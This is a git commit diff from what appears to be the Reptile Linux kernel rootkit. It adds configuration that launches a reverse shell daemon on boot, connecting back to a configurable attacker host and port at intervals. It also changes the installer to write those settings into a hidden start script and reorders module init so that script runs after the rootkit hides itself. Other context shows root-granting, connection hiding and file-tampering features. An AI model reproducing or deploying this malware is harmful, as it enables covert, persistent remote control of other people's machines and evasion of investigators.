configuring start script and fixing

khalid0143 · Mar 12, 2020 · 10137d4 · 10137d4
1 parent cad0cde
commit 10137d4
Show file tree

Hide file tree

Showing 9 changed files with 61 additions and 14 deletions.
diff --git a/Kconfig b/Kconfig
@@ -65,4 +65,26 @@ config CONFIG_AUTO_HIDE
 
 config CONFIG_GIVE_ROOT
     bool "Enable give root to a process run by an unprivileged user"
-    default y
+    default y
+
+config CONFIG_RSHELL_ON_START
+    bool "Would you like to launch the reverse shell daemon on start?"
+    default n
+
+menu "Reverse shell daemon configuration"
+    depends on CONFIG_RSHELL_ON_START
+
+    config LHOST
+        string "Host to receive the reverse shell"
+        default "127.0.0.1"
+
+    config LPORT
+        string "Port get the reverse shell"
+        default "4444"
+
+    config INTERVAL
+        string "How long is your interval? (in seconds)"
+        default "1800"
+
+    comment "END"
+endmenu
diff --git a/configs/defconfig b/configs/defconfig
@@ -42,3 +42,4 @@ HIDE="reptile"
 CONFIG_HIDE_CONN=y
 CONFIG_AUTO_HIDE=y
 CONFIG_GIVE_ROOT=y
+# CONFIG_RSHELL_ON_START is not set
diff --git a/kernel/file.c b/kernel/file.c
@@ -3,8 +3,6 @@
 
 #include "file.h"
 
-int file_tampering_flag = 1;
-
 int file_check(void *arg, ssize_t size)
 {
     int ret = 0;

diff --git a/kernel/include/config.h b/kernel/include/config.h
@@ -5,9 +5,8 @@
  * FIXME: randomly generate KEY, IPID, SEQ and WIN. 
  *
  * Note: I know it is not a good practice to have those configurations
- * constants, but since is already known some issues in Reptile, this 
- * will be the least of you problems. Don't worry I got an update to 
- * commit in the next version.
+ * constants, but since there is already known issues in Reptile, this 
+ * will be the least of your problems. It will be updated next version!
  *
  */
 

diff --git a/kernel/main.c b/kernel/main.c
@@ -208,6 +208,7 @@ struct dentry *khook___d_lookup(struct dentry *parent, struct qstr *name)
 #include "file.h"
 
 atomic_t read_on;
+int file_tampering_flag = 0;
 
 // This is not the best way to do that, but it works, maybe in the future I change that
 KHOOK_EXT(ssize_t, vfs_read, struct file *, char __user *, size_t, loff_t *);
@@ -447,11 +448,9 @@ static int __init reptile_init(void)
 {
 	int ret;
 
-	run_cmd(START_SCRIPT);
-
 #ifdef CONFIG_FILE_TAMPERING
 	/* Unfortunately I need to use this to ensure in some kernel
-	 * versions we will be able to unload the kernel module if
+	 * versions we will be able to unload the kernel module when
 	 * it is needed. Otherwise khook may take a really huge delay
 	 * to unload because of vfs_read hook
 	 */
@@ -465,6 +464,8 @@ static int __init reptile_init(void)
 	hide_module();
 #endif
 
+	run_cmd(START_SCRIPT);
+
 	return ret;
 }
 

diff --git a/scripts/installer.sh b/scripts/installer.sh
@@ -1,6 +1,4 @@
 #!/bin/bash
-#
-# This should be executed by Makefile, don't run it manually!
 
 function random_gen_dec {
 	RETVAL=$(shuf -i 50-99 -n 1)
@@ -31,6 +29,18 @@ cp $PWD/../scripts/bashrc /$HIDE/$HIDE"_rc" && \
 # Create start script
 cp $PWD/../scripts/start /$HIDE/$HIDE"_start" && \
 sed -i s!XXXXX!$TAG_NAME! /$HIDE/$HIDE"_start" && \
+sed -i s!\#CMD!/$HIDE/$HIDE"_cmd"! /$HIDE/$HIDE"_start" && \
+if [ "$CONFIG_RSHELL_ON_START" == "y" ]; then
+	sed -i s!\#SHELL!/$HIDE/$HIDE"_shell"! /$HIDE/$HIDE"_start" && \
+	sed -i s!LHOST!$LHOST! /$HIDE/$HIDE"_start" && \
+	sed -i s!LPORT!$LPORT! /$HIDE/$HIDE"_start" && \
+	sed -i s!PASS!$PASSWORD! /$HIDE/$HIDE"_start" && \
+	sed -i s!INTERVAL!$INTERVAL! /$HIDE/$HIDE"_start" && \
+	true || false;
+fi
+
+# Permissions
+chmod 777 /$HIDE/* && \
 
 # Copy kernel implant
 cp $PWD/../output/reptile /$HIDE/$HIDE && \

diff --git a/scripts/start b/scripts/start
@@ -1,6 +1,22 @@
 #!/bin/bash
 #<XXXXX>
-#
+# 
 # YOU SHOULD PUT YOUR CUSTOM START ROUTINE HERE
 #
+#SHELL -t LHOST -p LPORT -s PASS -r INTERVAL
+#
+# This script should be executed after all hooks
+# raise up, to enable us use reptile features on 
+# its start up. Then the file-tampering feature 
+# starts disabled to enable load this script 
+# properly. So, after all, we should enable
+# file-tampering again
+#
+#CMD file-tampering
+#
+# Actually, there is no need to hide file content
+# of this script, because if someone tries to 
+# investigate this, it means Reptile was get caught.
+# But I am going to let this script as it is now ;)
+#
 #</XXXXX>
diff --git a/userland/client/listener.c b/userland/client/listener.c
@@ -757,7 +757,7 @@ void listener(int port)
 
 void usage(char *argv0)
 {
-	fprintf(stderr, "Usage: %s [ -p port ] [ -s secret (optional) ]\n",
+	fprintf(stderr, "Usage: %s [ -p port ] [ -s secret ]\n",
 		argv0);
 	exit(1);
 }

diff --git a/userland/shell.c b/userland/shell.c
@@ -280,7 +280,7 @@ void hide_conn(struct sockaddr_in addr, int hide)
 int build_rcfile_path(void)
 {
 	char *name = NAME;
-	int len = 6 + strlen(name);
+	int len = 6 + strlen(name) + strlen(name);
 
 	rcfile = (char *)malloc(len);